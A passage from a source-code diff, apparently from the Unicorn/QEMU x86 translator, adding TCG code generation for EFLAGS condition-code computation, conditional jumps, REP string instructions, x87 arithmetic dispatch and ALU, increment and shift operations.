*cpu_T[1]); + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); +} + +static inline void gen_op_testl_T0_T1_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_and_tl(s, cpu_cc_dst, *cpu_T[0], *cpu_T[1]); +} + +static void gen_op_update_neg_cc(TCGContext *s) +{ + TCGv cpu_cc_dst = *(TCGv *)s->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)s->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)s->cpu_cc_srcT; + TCGv **cpu_T = (TCGv **)s->cpu_T; + + tcg_gen_mov_tl(s, cpu_cc_dst, *cpu_T[0]); + tcg_gen_neg_tl(s, cpu_cc_src, *cpu_T[0]); + tcg_gen_movi_tl(s, 
cpu_cc_srcT, 0); +} + +/* compute all eflags to cc_src */ +static void gen_compute_eflags(DisasContext *s) +{ + TCGv zero, dst, src1, src2; + int live, dead; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + + if (s->cc_op == CC_OP_EFLAGS) { + return; + } + if (s->cc_op == CC_OP_CLR) { + tcg_gen_movi_tl(tcg_ctx, cpu_cc_src, CC_Z | CC_P); + set_cc_op(s, CC_OP_EFLAGS); + return; + } + + TCGV_UNUSED(zero); + dst = cpu_cc_dst; + src1 = cpu_cc_src; + src2 = cpu_cc_src2; + + /* Take care to not read values that are not live. */ + live = cc_op_live[s->cc_op] & ~USES_CC_SRCT; + dead = live ^ (USES_CC_DST | USES_CC_SRC | USES_CC_SRC2); + if (dead) { + zero = tcg_const_tl(tcg_ctx, 0); + if (dead & USES_CC_DST) { + dst = zero; + } + if (dead & USES_CC_SRC) { + src1 = zero; + } + if (dead & USES_CC_SRC2) { + src2 = zero; + } + } + + gen_update_cc_op(s); + gen_helper_cc_compute_all(tcg_ctx, cpu_cc_src, dst, src1, src2, cpu_cc_op); + set_cc_op(s, CC_OP_EFLAGS); + + if (dead) { + tcg_temp_free(tcg_ctx, zero); + } +} + +typedef struct CCPrepare { + TCGCond cond; + TCGv reg; + TCGv reg2; + target_ulong imm; + target_ulong mask; + bool use_reg2; + bool no_setcond; +} CCPrepare; + +static inline CCPrepare ccprepare_make(TCGCond cond, + TCGv reg, TCGv reg2, + target_ulong imm, target_ulong mask, + bool use_reg2, bool no_setcond) +{ + CCPrepare cc = { cond, reg, reg2, imm, mask, use_reg2, no_setcond }; + return cc; +} + +/* compute eflags.C to reg */ +static CCPrepare gen_prepare_eflags_c(DisasContext *s, TCGv reg) +{ + TCGv t0, t1; + int size, shift; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + TCGv cpu_cc_srcT = 
*(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + + switch (s->cc_op) { + case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: + /* (DATA_TYPE)CC_SRCT < (DATA_TYPE)CC_SRC */ + size = s->cc_op - CC_OP_SUBB; + t1 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, false); + /* If no temporary was used, be careful not to alias t1 and t0. */ + t0 = TCGV_EQUAL(t1, cpu_cc_src) ? cpu_tmp0 : reg; + tcg_gen_mov_tl(tcg_ctx, t0, cpu_cc_srcT); + gen_extu(tcg_ctx, size, t0); + goto add_sub; + + case CC_OP_ADDB: case CC_OP_ADDW: case CC_OP_ADDL: case CC_OP_ADDQ: + /* (DATA_TYPE)CC_DST < (DATA_TYPE)CC_SRC */ + size = s->cc_op - CC_OP_ADDB; + t1 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, false); + t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_dst, size, false); + add_sub: + return ccprepare_make(TCG_COND_LTU, t0, t1, 0, -1, true, false); + + case CC_OP_LOGICB: case CC_OP_LOGICW: case CC_OP_LOGICL: case CC_OP_LOGICQ: + case CC_OP_CLR: + return ccprepare_make(TCG_COND_NEVER, 0, 0, 0, -1, false, false); + + case CC_OP_INCB: case CC_OP_INCW: case CC_OP_INCL: case CC_OP_INCQ: + case CC_OP_DECB: case CC_OP_DECW: case CC_OP_DECL: case CC_OP_DECQ: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, -1, false, true); + + case CC_OP_SHLB: case CC_OP_SHLW: case CC_OP_SHLL: case CC_OP_SHLQ: + /* (CC_SRC >> (DATA_BITS - 1)) & 1 */ + size = s->cc_op - CC_OP_SHLB; + shift = (8 << size) - 1; + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, (target_ulong)(1ULL << shift), false, false); + + case CC_OP_MULB: case CC_OP_MULW: case CC_OP_MULL: case CC_OP_MULQ: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, -1, false, false); + + case CC_OP_BMILGB: case CC_OP_BMILGW: case CC_OP_BMILGL: case CC_OP_BMILGQ: + size = s->cc_op - CC_OP_BMILGB; + t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_src, size, false); + return ccprepare_make(TCG_COND_EQ, t0, 0, 0, -1, false, false); + + case CC_OP_ADCX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, 
cpu_cc_dst, 0, 0, -1, false, true); + + case CC_OP_EFLAGS: + case CC_OP_SARB: case CC_OP_SARW: case CC_OP_SARL: case CC_OP_SARQ: + /* CC_SRC & 1 */ + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_C, false, false); + + default: + /* The need to compute only C from CC_OP_DYNAMIC is important + in efficiently implementing e.g. INC at the start of a TB. */ + gen_update_cc_op(s); + gen_helper_cc_compute_c(tcg_ctx, reg, cpu_cc_dst, cpu_cc_src, + cpu_cc_src2, cpu_cc_op); + return ccprepare_make(TCG_COND_NE, reg, 0, 0, -1, false, true); + } +} + +/* compute eflags.P to reg */ +static CCPrepare gen_prepare_eflags_p(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + gen_compute_eflags(s); + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_P, false, false); +} + +/* compute eflags.S to reg */ +static CCPrepare gen_prepare_eflags_s(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + switch (s->cc_op) { + case CC_OP_DYNAMIC: + gen_compute_eflags(s); + /* FALLTHRU */ + case CC_OP_EFLAGS: + case CC_OP_ADCX: + case CC_OP_ADOX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_S, false, false); + case CC_OP_CLR: + return ccprepare_make(TCG_COND_NEVER, 0, 0, 0, -1, false, false); + default: + { + TCGMemOp size = (s->cc_op - CC_OP_ADDB) & 3; + TCGv t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_dst, size, true); + return ccprepare_make(TCG_COND_LT, t0, 0, 0, -1, false, false); + } + } +} + +/* compute eflags.O to reg */ +static CCPrepare gen_prepare_eflags_o(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_src2 = *(TCGv *)tcg_ctx->cpu_cc_src2; + + switch (s->cc_op) { + case CC_OP_ADOX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, cpu_cc_src2, 0, 0, -1, false, 
true); + case CC_OP_CLR: + return ccprepare_make(TCG_COND_NEVER, 0, 0, 0, -1, false, false); + default: + gen_compute_eflags(s); + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_O, false, false); + } +} + +/* compute eflags.Z to reg */ +static CCPrepare gen_prepare_eflags_z(DisasContext *s, TCGv reg) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + switch (s->cc_op) { + case CC_OP_DYNAMIC: + gen_compute_eflags(s); + /* FALLTHRU */ + case CC_OP_EFLAGS: + case CC_OP_ADCX: + case CC_OP_ADOX: + case CC_OP_ADCOX: + return ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_Z, false, false); + case CC_OP_CLR: + return ccprepare_make(TCG_COND_ALWAYS, 0, 0, 0, -1, false, false); + default: + { + TCGMemOp size = (s->cc_op - CC_OP_ADDB) & 3; + TCGv t0 = gen_ext_tl(tcg_ctx, reg, cpu_cc_dst, size, false); + return ccprepare_make(TCG_COND_EQ, t0, 0, 0, -1, false, false); + } + } +} + +/* perform a conditional store into register 'reg' according to jump opcode + value 'b'. In the fast case, T0 is guaranteed not to be used. */ +static CCPrepare gen_prepare_cc(DisasContext *s, int b, TCGv reg) +{ + int inv, jcc_op, cond; + TCGMemOp size; + CCPrepare cc; + TCGv t0; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp0 = *(TCGv *)tcg_ctx->cpu_tmp0; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + + inv = b & 1; + jcc_op = (b >> 1) & 7; + + switch (s->cc_op) { + case CC_OP_SUBB: case CC_OP_SUBW: case CC_OP_SUBL: case CC_OP_SUBQ: + /* We optimize relational operators for the cmp/jcc case. 
*/ + size = s->cc_op - CC_OP_SUBB; + switch (jcc_op) { + case JCC_BE: + tcg_gen_mov_tl(tcg_ctx, cpu_tmp4, cpu_cc_srcT); + gen_extu(tcg_ctx, size, cpu_tmp4); + t0 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, false); + cc = ccprepare_make(TCG_COND_LEU, cpu_tmp4, t0, 0, -1, true, false); + break; + + case JCC_L: + cond = TCG_COND_LT; + goto fast_jcc_l; + case JCC_LE: + cond = TCG_COND_LE; + fast_jcc_l: + tcg_gen_mov_tl(tcg_ctx, cpu_tmp4, cpu_cc_srcT); + gen_exts(tcg_ctx, size, cpu_tmp4); + t0 = gen_ext_tl(tcg_ctx, cpu_tmp0, cpu_cc_src, size, true); + cc = ccprepare_make(cond, cpu_tmp4, t0, 0, -1, true, false); + break; + + default: + goto slow_jcc; + } + break; + + default: + slow_jcc: + /* This actually generates good code for JC, JZ and JS. */ + switch (jcc_op) { + case JCC_O: + cc = gen_prepare_eflags_o(s, reg); + break; + case JCC_B: + cc = gen_prepare_eflags_c(s, reg); + break; + case JCC_Z: + cc = gen_prepare_eflags_z(s, reg); + break; + case JCC_BE: + gen_compute_eflags(s); + cc = ccprepare_make(TCG_COND_NE, cpu_cc_src, 0, 0, CC_Z | CC_C, false, false); + break; + case JCC_S: + cc = gen_prepare_eflags_s(s, reg); + break; + case JCC_P: + cc = gen_prepare_eflags_p(s, reg); + break; + case JCC_L: + gen_compute_eflags(s); + if (TCGV_EQUAL(reg, cpu_cc_src)) { + reg = cpu_tmp0; + } + tcg_gen_shri_tl(tcg_ctx, reg, cpu_cc_src, 4); /* CC_O -> CC_S */ + tcg_gen_xor_tl(tcg_ctx, reg, reg, cpu_cc_src); + cc = ccprepare_make(TCG_COND_NE, reg, 0, 0, CC_S, false, false); + break; + default: + case JCC_LE: + gen_compute_eflags(s); + if (TCGV_EQUAL(reg, cpu_cc_src)) { + reg = cpu_tmp0; + } + tcg_gen_shri_tl(tcg_ctx, reg, cpu_cc_src, 4); /* CC_O -> CC_S */ + tcg_gen_xor_tl(tcg_ctx, reg, reg, cpu_cc_src); + cc = ccprepare_make(TCG_COND_NE, reg, 0, 0, CC_S | CC_Z, false, false); + break; + } + break; + } + + if (inv) { + cc.cond = tcg_invert_cond(cc.cond); + } + return cc; +} + +static void gen_setcc1(DisasContext *s, int b, TCGv reg) +{ + CCPrepare cc = gen_prepare_cc(s, b, 
reg); + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + if (cc.no_setcond) { + if (cc.cond == TCG_COND_EQ) { + tcg_gen_xori_tl(tcg_ctx, reg, cc.reg, 1); + } else { + tcg_gen_mov_tl(tcg_ctx, reg, cc.reg); + } + return; + } + + if (cc.cond == TCG_COND_NE && !cc.use_reg2 && cc.imm == 0 && + cc.mask != 0 && (cc.mask & (cc.mask - 1)) == 0) { + tcg_gen_shri_tl(tcg_ctx, reg, cc.reg, ctztl(cc.mask)); + tcg_gen_andi_tl(tcg_ctx, reg, reg, 1); + return; + } + if (cc.mask != -1) { + tcg_gen_andi_tl(tcg_ctx, reg, cc.reg, cc.mask); + cc.reg = reg; + } + if (cc.use_reg2) { + tcg_gen_setcond_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.reg2); + } else { + tcg_gen_setcondi_tl(tcg_ctx, cc.cond, reg, cc.reg, cc.imm); + } +} + +static inline void gen_compute_eflags_c(DisasContext *s, TCGv reg) +{ + gen_setcc1(s, JCC_B << 1, reg); +} + +/* generate a conditional jump to label 'l1' according to jump opcode + value 'b'. In the fast case, T0 is guaranteed not to be used. */ +static inline void gen_jcc1_noeob(DisasContext *s, int b, int l1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + CCPrepare cc = gen_prepare_cc(s, b, *cpu_T[0]); + + if (cc.mask != -1) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], cc.reg, cc.mask); + cc.reg = *cpu_T[0]; + } + if (cc.use_reg2) { + tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); + } else { + tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); + } +} + +/* Generate a conditional jump to label 'l1' according to jump opcode + value 'b'. In the fast case, T0 is guaranteed not to be used. + A translation block must end soon. 
*/ +static inline void gen_jcc1(DisasContext *s, int b, int l1) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + CCPrepare cc = gen_prepare_cc(s, b, *cpu_T[0]); + + gen_update_cc_op(s); + if (cc.mask != -1) { + tcg_gen_andi_tl(tcg_ctx, *cpu_T[0], cc.reg, cc.mask); + cc.reg = *cpu_T[0]; + } + set_cc_op(s, CC_OP_DYNAMIC); + if (cc.use_reg2) { + tcg_gen_brcond_tl(tcg_ctx, cc.cond, cc.reg, cc.reg2, l1); + } else { + tcg_gen_brcondi_tl(tcg_ctx, cc.cond, cc.reg, cc.imm, l1); + } +} + +/* XXX: does not work with gdbstub "ice" single step - not a + serious problem */ +static int gen_jz_ecx_string(DisasContext *s, target_ulong next_eip) +{ + int l1, l2; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + + l1 = gen_new_label(tcg_ctx); + l2 = gen_new_label(tcg_ctx); + gen_op_jnz_ecx(tcg_ctx, s->aflag, l1); + gen_set_label(tcg_ctx, l2); + gen_jmp_tb(s, next_eip, 1); + gen_set_label(tcg_ctx, l1); + return l2; +} + +static inline void gen_stos(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_op_mov_v_reg(tcg_ctx, MO_32, *cpu_T[0], R_EAX); + gen_string_movl_A0_EDI(s); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_lods(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_ESI(s); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_mov_reg_v(tcg_ctx, ot, R_EAX, *cpu_T[0]); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); +} + +static inline void gen_scas(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_EDI(s); + gen_op_ld_v(s, ot, *cpu_T[1], 
cpu_A0); + gen_op(s, OP_CMPL, ot, R_EAX); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_cmps(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + gen_string_movl_A0_EDI(s); + gen_op_ld_v(s, ot, *cpu_T[1], cpu_A0); + gen_string_movl_A0_ESI(s); + gen_op(s, OP_CMPL, ot, OR_TMP0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_ins(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + gen_string_movl_A0_EDI(s); + /* Note: we must do this dummy write first to be restartable in + case of page fault. */ + tcg_gen_movi_tl(tcg_ctx, *cpu_T[0], 0); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[R_EDX]); + tcg_gen_andi_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 0xffff); + gen_helper_in_func(tcg_ctx, ot, *cpu_T[0], cpu_tmp2_i32); + gen_op_st_v(s, ot, *cpu_T[0], cpu_A0); + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_EDI); +} + +static inline void gen_outs(DisasContext *s, TCGMemOp ot) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = tcg_ctx->cpu_tmp3_i32; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + TCGv **cpu_regs = (TCGv **)tcg_ctx->cpu_regs; + + gen_string_movl_A0_ESI(s); + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp2_i32, *cpu_regs[R_EDX]); + tcg_gen_andi_i32(tcg_ctx, cpu_tmp2_i32, cpu_tmp2_i32, 0xffff); + tcg_gen_trunc_tl_i32(tcg_ctx, cpu_tmp3_i32, *cpu_T[0]); + 
gen_helper_out_func(tcg_ctx, ot, cpu_tmp2_i32, cpu_tmp3_i32); + + gen_op_movl_T0_Dshift(tcg_ctx, ot); + gen_op_add_reg_T0(tcg_ctx, s->aflag, R_ESI); +} + +/* same method as Valgrind : we generate jumps to current or next + instruction */ +#define GEN_REPZ(op) \ +static inline void gen_repz_ ## op(DisasContext *s, TCGMemOp ot, \ + target_ulong cur_eip, target_ulong next_eip) \ +{ \ + int l2;\ + gen_update_cc_op(s); \ + l2 = gen_jz_ecx_string(s, next_eip); \ + gen_ ## op(s, ot); \ + gen_op_add_reg_im(s->uc->tcg_ctx, s->aflag, R_ECX, -1); \ + /* a loop would cause two single step exceptions if ECX = 1 \ + before rep string_insn */ \ + if (!s->jmp_opt) \ + gen_op_jz_ecx(s->uc->tcg_ctx, s->aflag, l2); \ + gen_jmp(s, cur_eip); \ +} + +#define GEN_REPZ2(op) \ +static inline void gen_repz_ ## op(DisasContext *s, TCGMemOp ot, \ + target_ulong cur_eip, \ + target_ulong next_eip, \ + int nz) \ +{ \ + int l2;\ + gen_update_cc_op(s); \ + l2 = gen_jz_ecx_string(s, next_eip); \ + gen_ ## op(s, ot); \ + gen_op_add_reg_im(s->uc->tcg_ctx, s->aflag, R_ECX, -1); \ + gen_update_cc_op(s); \ + gen_jcc1(s, (JCC_Z << 1) | (nz ^ 1), l2); \ + if (!s->jmp_opt) \ + gen_op_jz_ecx(s->uc->tcg_ctx, s->aflag, l2); \ + gen_jmp(s, cur_eip); \ +} + +GEN_REPZ(movs) +GEN_REPZ(stos) +GEN_REPZ(lods) +GEN_REPZ(ins) +GEN_REPZ(outs) +GEN_REPZ2(scas) +GEN_REPZ2(cmps) + +static void gen_helper_fp_arith_ST0_FT0(TCGContext *s, int op) +{ + switch (op) { + case 0: + gen_helper_fadd_ST0_FT0(s, s->cpu_env); + break; + case 1: + gen_helper_fmul_ST0_FT0(s, s->cpu_env); + break; + case 2: + gen_helper_fcom_ST0_FT0(s, s->cpu_env); + break; + case 3: + gen_helper_fcom_ST0_FT0(s, s->cpu_env); + break; + case 4: + gen_helper_fsub_ST0_FT0(s, s->cpu_env); + break; + case 5: + gen_helper_fsubr_ST0_FT0(s, s->cpu_env); + break; + case 6: + gen_helper_fdiv_ST0_FT0(s, s->cpu_env); + break; + case 7: + gen_helper_fdivr_ST0_FT0(s, s->cpu_env); + break; + } +} + +/* NOTE the exception in "r" op ordering */ +static void 
gen_helper_fp_arith_STN_ST0(TCGContext *s, int op, int opreg) +{ + TCGv_i32 tmp = tcg_const_i32(s, opreg); + switch (op) { + case 0: + gen_helper_fadd_STN_ST0(s, s->cpu_env, tmp); + break; + case 1: + gen_helper_fmul_STN_ST0(s, s->cpu_env, tmp); + break; + case 4: + gen_helper_fsubr_STN_ST0(s, s->cpu_env, tmp); + break; + case 5: + gen_helper_fsub_STN_ST0(s, s->cpu_env, tmp); + break; + case 6: + gen_helper_fdivr_STN_ST0(s, s->cpu_env, tmp); + break; + case 7: + gen_helper_fdiv_STN_ST0(s, s->cpu_env, tmp); + break; + } +} + +/* if d == OR_TMP0, it means memory operand (address in A0) */ +static void gen_op(DisasContext *s, int op, TCGMemOp ot, int d) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv cpu_cc_srcT = *(TCGv *)tcg_ctx->cpu_cc_srcT; + TCGv cpu_tmp4 = *(TCGv *)tcg_ctx->cpu_tmp4; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (d != OR_TMP0) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], d); + } else { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } + switch(op) { + case OP_ADCL: + gen_compute_eflags_c(s, cpu_tmp4); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp4); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update3_cc(tcg_ctx, cpu_tmp4); + set_cc_op(s, CC_OP_ADCB + ot); + break; + case OP_SBBL: + gen_compute_eflags_c(s, cpu_tmp4); + tcg_gen_sub_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + tcg_gen_sub_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], cpu_tmp4); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update3_cc(tcg_ctx, cpu_tmp4); + set_cc_op(s, CC_OP_SBBB + ot); + break; + case OP_ADDL: + tcg_gen_add_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_ADDB + ot); + break; + case OP_SUBL: + tcg_gen_mov_tl(tcg_ctx, cpu_cc_srcT, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 
*cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update2_cc(tcg_ctx); + set_cc_op(s, CC_OP_SUBB + ot); + break; + default: + case OP_ANDL: + tcg_gen_and_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case OP_ORL: + tcg_gen_or_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case OP_XORL: + tcg_gen_xor_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], *cpu_T[1]); + gen_op_st_rm_T0_A0(s, ot, d); + gen_op_update1_cc(tcg_ctx); + set_cc_op(s, CC_OP_LOGICB + ot); + break; + case OP_CMPL: + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, *cpu_T[1]); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_srcT, *cpu_T[0]); + tcg_gen_sub_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0], *cpu_T[1]); + set_cc_op(s, CC_OP_SUBB + ot); + break; + } +} + +/* if d == OR_TMP0, it means memory operand (address in A0) */ +static void gen_inc(DisasContext *s, TCGMemOp ot, int d, int c) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv cpu_A0 = *(TCGv *)tcg_ctx->cpu_A0; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + TCGv **cpu_T = (TCGv **)tcg_ctx->cpu_T; + + if (d != OR_TMP0) { + gen_op_mov_v_reg(tcg_ctx, ot, *cpu_T[0], d); + } else { + gen_op_ld_v(s, ot, *cpu_T[0], cpu_A0); + } + gen_compute_eflags_c(s, cpu_cc_src); + if (c > 0) { + tcg_gen_addi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], 1); + set_cc_op(s, CC_OP_INCB + ot); + } else { + tcg_gen_addi_tl(tcg_ctx, *cpu_T[0], *cpu_T[0], -1); + set_cc_op(s, CC_OP_DECB + ot); + } + gen_op_st_rm_T0_A0(s, ot, d); + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, *cpu_T[0]); +} + +static void gen_shift_flags(DisasContext *s, TCGMemOp ot, TCGv result, + TCGv shm1, TCGv count, bool is_right) +{ + TCGv_i32 z32, s32, oldop; + TCGv z_tl; + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i32 cpu_tmp2_i32 = tcg_ctx->cpu_tmp2_i32; + TCGv_i32 cpu_tmp3_i32 = 
tcg_ctx->cpu_tmp3_i32; + TCGv_i32 cpu_cc_op = tcg_ctx->cpu_cc_op; + TCGv cpu_cc_dst = *(TCGv *)tcg_ctx->cpu_cc_dst; + TCGv cpu_cc_src = *(TCGv *)tcg_ctx->cpu_cc_src; + + /* Store the results into the CC variables. If we know that the + variable must be dead, store unconditionally. Otherwise we'll + need to not disrupt the current contents. */ + z_tl = tcg_const_tl(tcg_ctx, 0); + if (cc_op_live[s->cc_op] & USES_CC_DST) { + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, cpu_cc_dst, count, z_tl, + result, cpu_cc_dst); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_cc_dst, result); + } + if (cc_op_live[s->cc_op] & USES_CC_SRC) { + tcg_gen_movcond_tl(tcg_ctx, TCG_COND_NE, cpu_cc_src, count, z_tl, + shm1, cpu_cc_src); + } else { + tcg_gen_mov_tl(tcg_ctx, cpu_cc_src, shm1); + } + tcg_temp_free(tcg_ctx, z_tl); + + /* Get the two potential CC_OP values into temporaries. */ + tcg_gen_movi_i32(tcg_ctx, cpu_tmp2_i32, (is_right ? CC_OP_SARB : CC_OP_SHLB) + ot); + if (s->cc_op == CC_OP_DYNAMIC) { + oldop = cpu_cc_op; + } else { + tcg_gen_movi_i32(tcg_ctx, cpu_tmp3_i32, s->cc_op); + oldop = 